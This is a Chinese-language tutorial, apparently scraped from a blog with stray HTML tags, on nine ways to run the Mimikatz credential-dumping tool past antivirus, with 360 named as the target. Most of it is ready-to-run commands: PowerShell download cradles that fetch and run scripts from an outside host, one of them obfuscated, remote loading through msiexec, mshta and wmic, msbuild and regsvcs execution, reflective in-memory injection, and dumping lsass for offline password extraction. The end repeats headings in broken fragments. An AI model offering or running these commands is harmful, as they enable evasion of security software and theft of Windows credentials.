Mimikatz绕过杀软执行九种姿势详解<\/h1>

前言<\/h2>
Mimikatz是一款功能强大的Windows凭证提取工具，但由于其敏感性，大多数杀毒软件都会对其进行拦截。本文详细介绍了九种绕过杀软（以360为例）执行Mimikatz的方法，仅供技术研究和防御参考。<\/p>

姿势一：PowerShell加载<\/h2>

基础方法<\/h3>

powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"<\/span>
<\/span><\/span><\/code><\/pre>远程加载<\/h3>
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http:\/\/192.168.0.101\/Invoke-Mimikatz.ps1'<\/span>);Invoke-Mimikatz
<\/span><\/span><\/code><\/pre>混淆绕过<\/h3>
powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp:\/\/'+'192.168.0'+'.101\/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"<\/span>
<\/span><\/span><\/code><\/pre>姿势二：.NET 2.0加载<\/h2>
准备工作<\/h3>

下载katz.cs文件<\/li>
放置于C:\Windows\Microsoft.NET\Framework\v2.0.50727<\/code><\/li>
<\/ol>
PowerShell生成密钥<\/h3>
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq\/vWx979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu\/WxZaffHS2te\/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g\/P+JpXGN0\/+Hitolufo7Ucjh+WvZAU\/\/dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm\/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15\/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX\/tqcBuBIg\/cpcDHps\/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b\/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='<\/span>
<\/span><\/span>$Content = [System.Convert]<\/span>::FromBase64String($key)
<\/span><\/span>Set-Content key.snk -Value $Content -Encoding Byte
<\/span><\/span><\/code><\/pre>编译执行<\/h3>
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe \/r:System.EnterpriseServices.dll \/out:katz.exe \/keyfile:key.snk \/unsafe katz.cs<\/span>
<\/span><\/span>C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe<\/span>
<\/span><\/span><\/code><\/pre>姿势三：JS加载<\/h2>
方法<\/h3>
使用DotNetToJScript实现：<\/p>

下载mimikatz.js<\/li>
执行：<\/li>
<\/ol>
cscript mimikatz.js
<\/span><\/span><\/code><\/pre>绕过方法<\/h3>
参考：AMSI bypass<\/a><\/p>
姿势四：msiexec加载<\/h2>
远程执行<\/h3>
msiexec.exe \/passive \/i https:<\/span>\/\/github.com\/homjxi0e\/PowerScript\/raw\/master\/Mimikatz.2.1.1\/X64\/Mimikatz%<\/span>20x64.msi \/norestart
<\/span><\/span><\/code><\/pre>本地执行<\/h3>
msiexec \/passive \/i C:\Users\Administrator\Downloads\Mimikatz.msi
<\/span><\/span><\/code><\/pre>姿势五：.NET 4.0加载<\/h2>
方法<\/h3>

下载mimikatz.xml<\/li>
执行：<\/li>
<\/ol>
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe mimikatz.xml<\/span>
<\/span><\/span><\/code><\/pre>姿势六：JScript的XSL版<\/h2>
方法<\/h3>

下载mimikatz.xsl<\/li>
本地加载：<\/li>
<\/ol>
wmic os get \/format:"mimikatz.xsl"<\/span>
<\/span><\/span><\/code><\/pre>
远程加载：<\/li>
<\/ol>
wmic os get \/format:"http:\/\/127.0.0.1\/mimikatz.xsl"<\/span>
<\/span><\/span><\/code><\/pre>姿势七：JScript的SCT版<\/h2>
方法<\/h3>

下载mimikatz.sct<\/li>
执行：<\/li>
<\/ol>
mshta.exe javascript:a=GetObject("script:https:\/\/gist.github.com\/caseysmithrc\/3fe7a8330a74b303562eb494d47e79c5\/raw\/9336891fc81ac71bfff3c8fd4a8816dead30964e\/mimikatz.sct"<\/span>).Exec(); log coffee exit
<\/span><\/span><\/code><\/pre>姿势八：内存中加载<\/h2>
方法<\/h3>

下载Invoke-ReflectivePEInjection.ps1<\/li>
执行：<\/li>
<\/ol>
powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http:\/\/192.168.0.101\/Invoke-ReflectivePEInjection.ps1'<\/span>);Invoke-ReflectivePEInjection -PEUrl http:<\/span>\/\/192.168.0.101\/mimikatz.exe -ExeArgs "sekurlsa::logonpasswords"<\/span> -ForceASLR
<\/span><\/span><\/code><\/pre>姿势九：导出lsass进程离线读密码<\/h2>
方法一：使用procdump<\/h3>
procdump64.exe -accepteula -ma lsass.exe 1.dmp
<\/span><\/span><\/code><\/pre>方法二：任务管理器转储<\/h3>

打开任务管理器<\/li>
找到lsass.exe进程<\/li>
右键"创建转储文件"<\/li>
<\/ol>
离线分析<\/h3>
mimikatz_2.1_64.exe "sekurlsa::minidump 1.dmp"<\/span> "sekurlsa::logonPasswords full"<\/span> exit
<\/span><\/span><\/code><\/pre>总结<\/h2>

导出lsass进程内存方式是较为稳定可靠的方法<\/li>
PowerShell远程加载脚本方式简单方便<\/li>
不同环境可能需要尝试多种方法才能成功绕过防护<\/li>
<\/ol>
注意：本文所述技术仅供安全研究和防御参考，请勿用于非法用途。<\/em><\/p>

Mimikatz绕过杀软执行九种姿势详解<\/h1>

前言<\/h2> Mimikatz是一款功能强大的Windows凭证提取工具，但由于其敏感性，大多数杀毒软件都会对其进行拦截。本文详细介绍了九种绕过杀软（以360为例）执行Mimikatz的方法，仅供技术研究和防御参考。<\/p>

姿势一：PowerShell加载<\/h2>

姿势二：.NET 2.0加载<\/h2>

姿势三：JS加载<\/h2>

绕过方法<\/h3> 参考：AMSI bypass<\/a><\/p>

姿势五：.NET 4.0加载<\/h2>

姿势六：JScript的XSL版<\/h2>

姿势七：JScript的SCT版<\/h2>

姿势八：内存中加载<\/h2>

姿势九：导出lsass进程离线读密码<\/h2>

前言<\/h2>
Mimikatz是一款功能强大的Windows凭证提取工具，但由于其敏感性，大多数杀毒软件都会对其进行拦截。本文详细介绍了九种绕过杀软（以360为例）执行Mimikatz的方法，仅供技术研究和防御参考。<\/p>

绕过方法<\/h3>
参考：AMSI bypass<\/a><\/p>